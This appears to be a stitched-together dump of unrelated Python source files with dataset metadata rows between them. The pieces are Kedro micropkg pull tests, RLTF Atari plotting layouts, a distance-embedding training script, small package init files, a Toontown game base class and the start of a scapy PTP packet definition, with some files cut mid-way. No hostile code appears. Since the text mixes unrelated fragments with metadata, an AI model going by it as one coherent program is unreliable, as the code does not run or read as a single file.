        pipeline_name = alias or PIPELINE_NAME
        source_dest = fake_package_path / pipeline_name
        test_dest = fake_repo_path / "src" / "tests" / pipeline_name
        config_env = env or "base"
        dest_params_config = (
            fake_repo_path
            / settings.CONF_SOURCE
            / config_env
            / "parameters"
            / f"{pipeline_name}.yml"
        )

        self.assert_package_files_exist(source_dest)
        assert dest_params_config.is_file()
        actual_test_files = {f.name for f in test_dest.iterdir()}
        expected_test_files = {"__init__.py", "test_pipeline.py"}
        assert actual_test_files == expected_test_files

    def test_invalid_pull_from_pypi(
        self, fake_project_cli, mocker, tmp_path, fake_metadata
    ):
        """
        Test for pulling package from pypi, and it cannot be found.
        """
        pypi_error_message = (
            "ERROR: Could not find a version that satisfies the requirement"
        )
        python_call_mock = mocker.patch(
            "kedro.framework.cli.micropkg.python_call",
            side_effect=ClickException(pypi_error_message),
        )
        mocker.patch(
            "kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
            return_value=tmp_path,
        )

        invalid_pypi_name = "non_existent"
        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", invalid_pypi_name], obj=fake_metadata
        )
        assert result.exit_code

        python_call_mock.assert_called_once_with(
            "pip", ["download", "--no-deps", "--dest", str(tmp_path), invalid_pypi_name]
        )
        assert pypi_error_message in result.stdout

    def test_pull_from_pypi_more_than_one_sdist_file(
        self, fake_project_cli, mocker, tmp_path, fake_metadata
    ):
        """
        Test for pulling a sdist file with `pip download`, but there is more than one
        sdist file to unzip.
        """
        # We mock the `pip download` call, and manually create a package sdist file
        # to simulate the pypi scenario instead
        call_pipeline_create(fake_project_cli, fake_metadata)
        call_micropkg_package(fake_project_cli, fake_metadata, destination=tmp_path)
        call_micropkg_package(
            fake_project_cli, fake_metadata, alias="another", destination=tmp_path
        )
        mocker.patch("kedro.framework.cli.micropkg.python_call")
        mocker.patch(
            "kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
            return_value=tmp_path,
        )
        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", PIPELINE_NAME], obj=fake_metadata
        )

        assert result.exit_code
        assert "Error: More than 1 or no sdist files found:" in result.output

    def test_pull_unsupported_protocol_by_fsspec(
        self, fake_project_cli, fake_metadata, tmp_path, mocker
    ):
        protocol = "unsupported"
        exception_message = f"Protocol not known: {protocol}"
        error_message = "Error: More than 1 or no sdist files found:"
        package_path = f"{protocol}://{PIPELINE_NAME}"

        python_call_mock = mocker.patch("kedro.framework.cli.micropkg.python_call")
        filesystem_mock = mocker.patch(
            "fsspec.filesystem", side_effect=ValueError(exception_message)
        )
        mocker.patch(
            "kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
            return_value=tmp_path,
        )

        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", package_path], obj=fake_metadata
        )

        assert result.exit_code
        filesystem_mock.assert_called_once_with(protocol)
        python_call_mock.assert_called_once_with(
            "pip", ["download", "--no-deps", "--dest", str(tmp_path), package_path]
        )
        assert exception_message in result.output
        assert "Trying to use 'pip download'..." in result.output
        assert error_message in result.output


@pytest.mark.usefixtures(
    "chdir_to_dummy_project", "patch_log", "cleanup_dist", "cleanup_pyproject_toml"
)
class TestMicropkgPullFromManifest:
    def test_micropkg_pull_all(  # pylint: disable=too-many-locals
        self, fake_repo_path, fake_project_cli, fake_metadata, mocker
    ):
        # pylint: disable=import-outside-toplevel, line-too-long
        from kedro.framework.cli import micropkg

        spy = mocker.spy(micropkg, "_pull_package")
        pyproject_toml = fake_repo_path / "pyproject.toml"
        sdist_file = str(fake_repo_path / "dist" / _get_sdist_name("{}", "0.1"))
        project_toml_str = textwrap.dedent(
            f"""
            [tool.kedro.micropkg.pull]
            "{sdist_file.format("first")}" = {{alias = "dp", destination = "pipelines"}}
            "{sdist_file.format("second")}" = {{alias = "ds", destination = "pipelines", env = "local"}}
            "{sdist_file.format("third")}" = {{}}
            """
        )

        with pyproject_toml.open(mode="a") as file:
            file.write(project_toml_str)

        for name in ("first", "second", "third"):
            call_pipeline_create(fake_project_cli, fake_metadata, pipeline_name=name)
            call_micropkg_package(fake_project_cli, fake_metadata, pipeline_name=name)
            call_pipeline_delete(fake_project_cli, fake_metadata, pipeline_name=name)

        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
        )

        assert result.exit_code == 0
        assert "Micro-packages pulled and unpacked!" in result.output
        assert spy.call_count == 3

        build_config = toml.loads(project_toml_str)
        pull_manifest = build_config["tool"]["kedro"]["micropkg"]["pull"]

        for sdist_file, pull_specs in pull_manifest.items():
            expected_call = mocker.call(sdist_file, fake_metadata, **pull_specs)
            assert expected_call in spy.call_args_list

    def test_micropkg_pull_all_empty_toml(
        self, fake_repo_path, fake_project_cli, fake_metadata, mocker
    ):
        # pylint: disable=import-outside-toplevel
        from kedro.framework.cli import micropkg

        spy = mocker.spy(micropkg, "_pull_package")
        pyproject_toml = fake_repo_path / "pyproject.toml"
        with pyproject_toml.open(mode="a") as file:
            file.write("\n[tool.kedro.micropkg.pull]\n")

        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
        )

        assert result.exit_code == 0
        expected_message = (
            "Nothing to pull. Please update the `pyproject.toml` package "
            "manifest section."
        )
        assert expected_message in result.output
        assert not spy.called

    def test_invalid_toml(self, fake_repo_path, fake_project_cli, fake_metadata):
        pyproject_toml = fake_repo_path / "pyproject.toml"
        with pyproject_toml.open(mode="a") as file:
            file.write("what/toml?")

        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
        )

        assert result.exit_code
        assert isinstance(result.exception, toml.TomlDecodeError)

    def test_micropkg_pull_no_arg_provided(self, fake_project_cli, fake_metadata):
        result = CliRunner().invoke(
            fake_project_cli, ["micropkg", "pull"], obj=fake_metadata
        )
        assert result.exit_code
        expected_message = (
            "Please specify a package path or add '--all' to pull all micro-packages in the"
            " `pyproject.toml` package manifest section."
        )
        assert expected_message in result.output
# rltf/utils/layouts.py (repo: nikonikolov/rltf, rev d5671449, license: MIT)
from collections import OrderedDict
def plot_bars(ax, kwargs, env, color):
    x = atari_labels(env.unwrapped.get_action_meanings())
    return ax.bar(x=x, **kwargs, color=color)


def plot_highlight_bars(ax, kwargs, env, color_n='#1f77b4', color_hi='#d62728'):
    x = atari_labels(env.unwrapped.get_action_meanings())
    color = [color_n] * len(x)
    a = kwargs.pop("a")
    color[a] = color_hi
    return ax.bar(x=x, **kwargs, color=color)


def atari_labels(x):
    for i, label in enumerate(x):
        if label[-4:] == "FIRE":
            if len(label) > 4:
                end = "\nFIRE"
                length = len(label[:-4])
                if length >= 6:
                    if label[:2] == "UP":
                        start = "UP\n" + label[2:-4]
                    elif label[:4] == "DOWN":
                        start = "DOWN\n" + label[4:-4]
                    else:
                        raise ValueError
                else:
                    start = label[:-4]
                x[i] = start + end
        elif len(label) >= 6:
            length = len(label)
            if label[:2] == "UP":
                x[i] = "UP\n" + label[2:]
            elif label[:4] == "DOWN":
                x[i] = "DOWN\n" + label[4:]
            else:
                raise ValueError
    return x


qrdqn_layout = {
    "width": 900,
    "height": 440,
    "obs_align": dict(vertical='center', horizontal='left'),
    # "obs_scale": 1.0,
    "figures": {
        "train_actions": {
            "align": dict(vertical='center', horizontal='right'),
            "width": 720,
            "height": -1,
            "fig": {
                "subplots": dict(nrows=2, ncols=1, sharex=True),
                "subplots_conf": OrderedDict(
                    a_q={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="Q FUNCTION", size=6),
                    },
                    a_z_var={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="Z VARIANCE", size=6),
                    },
                    # a_z={
                    #     "tick_params": dict(axis='y', labelsize=5.5),
                    #     "set_title": dict(label="Z", size=6),
                    # },
                ),
                "subplots_common": {
                    "grid": dict(linewidth=0.2),
                    "tick_params": dict(axis='x', labelsize=6.5),
                },
                "fig_conf": {
                    "tight_layout": dict(pad=1.0, h_pad=0.0),
                },
            },
            "plot_function": plot_highlight_bars,
        },
        "eval_actions": {
            "align": dict(vertical='center', horizontal='right'),
            "width": 720,
            "height": -1,
            "fig": {
                "subplots": dict(nrows=2, ncols=1),
                "subplots_conf": OrderedDict(
                    a_q={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="Q FUNCTION", size=6),
                    },
                    a_z_var={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="Z VARIANCE", size=6),
                    },
                    # a_z={
                    #     "tick_params": dict(axis='y', labelsize=5.5),
                    #     "set_title": dict(label="Z", size=6),
                    # },
                ),
                "subplots_common": {
                    "tick_params": dict(axis='x', labelsize=6.5),
                },
                "fig_conf": {
                    "tight_layout": dict(pad=1.0, h_pad=0.0),
                },
            },
            "plot_function": plot_highlight_bars,
        },
    }
}


ids_homoscedastic_layout = {
    "width": 800,
    "height": 300,
    "obs_align": dict(vertical='center', horizontal='left'),
    # "obs_scale": 1.0,
    "figures": {
        "train_actions": {
            "align": dict(vertical='center', horizontal='right'),
            "width": 620,
            "height": -1,
            "fig": {
                "subplots": dict(nrows=3, ncols=1, sharex=True),
                "subplots_conf": OrderedDict(
                    a_mean={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="MEAN", size=6),
                    },
                    a_std={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="STD", size=6),
                    },
                    a_ids={
                        "tick_params": dict(axis='y', labelsize=5.5),
                        "set_title": dict(label="IDS", size=6),
                    },
                ),
                "subplots_common": {
                    "grid": dict(linewidth=0.2),
                    "tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
"eval_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 620,
"height": -1,
"fig": {
"subplots": dict(nrows=1, ncols=1),
"subplots_conf": OrderedDict(
a_mean={
"set_title": dict(label="MEANS", size=8),
"tick_params": dict(axis='y', labelsize=8),
},
# a_vote={
# "set_title": dict(label="VOTES", size=8),
# "tick_params": dict(axis='y', labelsize=8),
# },
),
"subplots_common": {
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
}
}
ids_heteroscedastic_layout = {
"width": 840,
"height": 440,
"obs_align": dict(vertical='center', horizontal='left'),
# "obs_scale": 1.0,
"figures": {
"train_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 660,
"height": -1,
"fig": {
"subplots": dict(nrows=4, ncols=1, sharex=True),
"subplots_conf": OrderedDict(
a_mean={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="MEAN", size=6),
},
a_std={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="STD", size=6),
},
a_rho2={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label=r'$RHO^2$', size=6),
},
a_ids={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="IDS", size=6),
},
),
"subplots_common": {
"grid": dict(linewidth=0.2),
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
"eval_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 660,
"height": -1,
"fig": {
"subplots": dict(nrows=1, ncols=1),
"subplots_conf": OrderedDict(
a_mean={
"set_title": dict(label="MEANS", size=8),
"tick_params": dict(axis='y', labelsize=8),
},
# a_vote={
# "set_title": dict(label="VOTES", size=8),
# "tick_params": dict(axis='y', labelsize=8),
# },
),
"subplots_common": {
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
}
}
layouts = {
"QRDQN": qrdqn_layout,
"DQN_IDS": ids_homoscedastic_layout,
"BDQN_IDS": ids_homoscedastic_layout,
"C51_IDS": ids_heteroscedastic_layout,
"QRDQN_IDS": ids_heteroscedastic_layout,
}
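Note that several agents share one layout object in `layouts` above (e.g. DQN_IDS and BDQN_IDS both map to `ids_homoscedastic_layout`). A minimal sketch with hypothetical values shows the aliasing this implies:

```python
# Two keys pointing at the same dict: a mutation through one key is
# visible through the other, so shared layouts should be treated as
# read-only (or copied before making per-agent tweaks).
ids_layout = {"width": 800, "height": 300}
layouts = {"DQN_IDS": ids_layout, "BDQN_IDS": ids_layout}

layouts["DQN_IDS"]["width"] = 820
print(layouts["BDQN_IDS"]["width"])  # 820
```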
| 28.256809 | 80 | 0.495731 | 847 | 7,262 | 4.072019 | 0.141677 | 0.066686 | 0.09336 | 0.120035 | 0.81067 | 0.799072 | 0.799072 | 0.799072 | 0.772398 | 0.753842 | 0 | 0.035945 | 0.318094 | 7,262 | 256 | 81 | 28.367188 | 0.660541 | 0.062104 | 0 | 0.604545 | 0 | 0 | 0.192461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013636 | false | 0 | 0.004545 | 0 | 0.031818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
773ac63ab0430b4500d79b608bc9cee6f43580ec | 33 | py | Python | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | from .main import ProxmoxManager
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
77496336f4868d138adf58642534e63629aea473 | 7,284 | py | Python | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | 10 | 2019-08-01T07:41:11.000Z | 2021-08-09T20:52:37.000Z | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | null | null | null | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | null | null | null | import os
import sys
from time import time
import logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)
import numpy as np
import tensorflow as tf
from utils import *
org_distances = np.loadtxt('./data/Sales_Transaction_Dataset.dist', delimiter=',')
logging.info("Load DTW distance data from local file")
file_name = 'Sales'
embed_dims = [30]
n_epochs = 30
batch_size = 4096
num_nodes = org_distances.shape[0]
distance_adjustment = 1e-5
node_pairs = np.array([[i, j] for i in range(num_nodes) for j in range(i+1, num_nodes)])
obj_distances_origin = np.array([org_distances[i, j] for i in range(num_nodes) for j in range(i+1, num_nodes)])
logging.info("node pairs shape: {}, obj_distances shape: {}".format(
node_pairs.shape, obj_distances_origin.shape))
max_try = 1
normalize_distance = True
if normalize_distance:
obj_min = obj_distances_origin.min()
obj_max = obj_distances_origin.max()
obj_distances = (obj_distances_origin - obj_min) / (obj_max - obj_min) + distance_adjustment
else:
obj_distances = obj_distances_origin + distance_adjustment
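The normalization above maps the DTW distances into (adjustment, 1 + adjustment], and the same transform is inverted on `embed_distances` after each training run. A pure-Python sketch of the round trip (values hypothetical):

```python
# Min-max normalize with a small positive offset (mirrors
# distance_adjustment above), then invert the transform.
adjustment = 1e-5
d = [2.0, 5.0, 11.0]
d_min, d_max = min(d), max(d)
normalized = [(x - d_min) / (d_max - d_min) + adjustment for x in d]
recovered = [(n - adjustment) * (d_max - d_min) + d_min for n in normalized]
print(all(abs(a - b) < 1e-9 for a, b in zip(recovered, d)))  # True
```

The offset keeps every distance strictly positive, which matters for embedding objectives that divide by or take logarithms of the target distance.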
for embed_dim in embed_dims:
# Wass R2
logging.info("Running Wasserstein R2 embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
learning_rate=0.001, n_epochs=n_epochs, ground_dim=2, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR2', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR2', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# KL
logging.info("Running KL embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='KL', embed_dim=embed_dim,
learning_rate=0.01, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'KL', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'KL', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# Euclidean
logging.info("Running Euclidean embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Euc', embed_dim=embed_dim,
learning_rate=0.001, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'Euclidean', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'Euclidean', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# Hyperbolic
logging.info("Running Hyperbolic embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Hyper', embed_dim=embed_dim,
learning_rate=0.00005, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'Hyperbolic', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'Hyperbolic', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# # Wass R3
# logging.info("Running Wasserstein R3 embedding, embed dim={}".format(embed_dim))
# try_count = 0
# while try_count < max_try:
# try:
# embeddings, loss_history, time_history, embed_distances, jac = train(
# node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
# learning_rate=0.001, n_epochs=n_epochs, ground_dim=3, nodes=num_nodes, batch_size=batch_size)
# break
# except RuntimeError:
# logging.warning("Got loss NaN")
# try_count += 1
# else:
# logging.warning("Fail.")
# if normalize_distance:
# embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
# logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR3', embed_dim))
# np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR3', embed_dim),
# embeddings=embeddings, loss=loss_history, time=time_history,
# embed_distances=embed_distances)
# # Wass R4
# logging.info("Running Wasserstein R4 embedding, embed dim={}".format(embed_dim))
# try_count = 0
# while try_count < max_try:
# try:
# embeddings, loss_history, time_history, embed_distances, jac = train(
# node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
# learning_rate=0.001, n_epochs=n_epochs, ground_dim=4, nodes=num_nodes, batch_size=batch_size)
# break
# except RuntimeError:
# logging.warning("Got loss NaN")
# try_count += 1
# else:
# logging.warning("Fail.")
# if normalize_distance:
# embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
# logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR4', embed_dim))
# np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR4', embed_dim),
# embeddings=embeddings, loss=loss_history, time=time_history,
# embed_distances=embed_distances)
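Each embedding run above uses the same retry idiom: a `while` loop wrapping `train` in `try`/`except RuntimeError`, with a loop `else` clause that fires only when every attempt failed (i.e. the loop ended without hitting `break`). A self-contained sketch of that pattern (names hypothetical):

```python
# while/else retry: the else branch runs only if no attempt broke out
# of the loop, matching the "Fail." warning in the script above.
def run_with_retries(job, max_try=3):
    try_count = 0
    while try_count < max_try:
        try:
            result = job()
            break
        except RuntimeError:
            try_count += 1
    else:
        return None  # every attempt raised; caller sees failure
    return result

attempts = []
def flaky():
    attempts.append(1)
    if len(attempts) < 2:
        raise RuntimeError("loss NaN")
    return "ok"

print(run_with_retries(flaky))  # ok
```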
| 43.357143 | 111 | 0.662685 | 916 | 7,284 | 4.956332 | 0.122271 | 0.065198 | 0.039648 | 0.066079 | 0.813436 | 0.788767 | 0.771586 | 0.758811 | 0.758811 | 0.704626 | 0 | 0.011636 | 0.221307 | 7,284 | 167 | 112 | 43.616766 | 0.788787 | 0.260708 | 0 | 0.552381 | 0 | 0 | 0.132284 | 0.02492 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
622916e739637a1f160999cffcb577b6be273cba | 22 | py | Python | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | from . import objects
| 11 | 21 | 0.772727 | 3 | 22 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 22 | 1 | 22 | 22 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6555535ba14dc4c2849554f46164bbaf35276415 | 101 | py | Python | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | 1 | 2022-02-07T15:54:30.000Z | 2022-02-07T15:54:30.000Z | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | null | null | null | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | 1 | 2021-04-27T14:02:40.000Z | 2021-04-27T14:02:40.000Z | def double(x: int=4):
return x * 2
print(double())
print(double(3))
# confirmed correct syntax
| 12.625 | 26 | 0.663366 | 16 | 101 | 4.1875 | 0.75 | 0.328358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 0.188119 | 101 | 7 | 27 | 14.428571 | 0.780488 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
658d2d27417a464531cf4a4c9af619515137783b | 293 | py | Python | toontown/cogdominium/DistCogdoGameBase.py | LittleNed/toontown-stride | 1252a8f9a8816c1810106006d09c8bdfe6ad1e57 | [
"Apache-2.0"
] | 3 | 2020-01-02T08:43:36.000Z | 2020-07-05T08:59:02.000Z | toontown/cogdominium/DistCogdoGameBase.py | NoraTT/Historical-Commits-Project-Altis-Source | fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179 | [
"Apache-2.0"
] | null | null | null | toontown/cogdominium/DistCogdoGameBase.py | NoraTT/Historical-Commits-Project-Altis-Source | fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179 | [
"Apache-2.0"
] | 4 | 2019-06-20T23:45:23.000Z | 2020-10-14T20:30:15.000Z |
class DistCogdoGameBase:
def local2GameTime(self, timestamp):
return timestamp - self._startTime
def game2LocalTime(self, timestamp):
return timestamp + self._startTime
def getCurrentGameTime(self):
return self.local2GameTime(globalClock.getFrameTime()) | 26.636364 | 62 | 0.723549 | 26 | 293 | 8.076923 | 0.461538 | 0.12381 | 0.180952 | 0.266667 | 0.419048 | 0.419048 | 0.419048 | 0 | 0 | 0 | 0 | 0.012821 | 0.201365 | 293 | 11 | 62 | 26.636364 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.428571 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
02b818febef4bd058845e7d71c9a5f17c5bd3193 | 11,226 | py | Python | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | null | null | null | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | null | null | null | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | 1 | 2021-06-04T09:41:08.000Z | 2021-06-04T09:41:08.000Z | from scapy.fields import BitEnumField, \
BitField, \
ByteField, \
IntField, \
ConditionalField, \
FlagsField, \
LongField, \
XShortField, \
ShortField, \
SignedByteField, \
XBitField, \
XByteField, \
XIntField, \
XStrFixedLenField
from scapy.packet import Packet
class Sync(Packet):
"""Precision Time Protocol"""
name = "PTP protocol Sync"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x0, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 255),
FlagsField("flags", 0x0000, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0x9E48),
XByteField("control", 0x05),
SignedByteField("logMessageInterval", 0x0F),
# Sync
BitField("originTimestamp", 0x000045B111510472F9C1, 80)
]
class DelayReq(Packet):
"""Precision Time Protocol"""
name = "PTP protocol"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
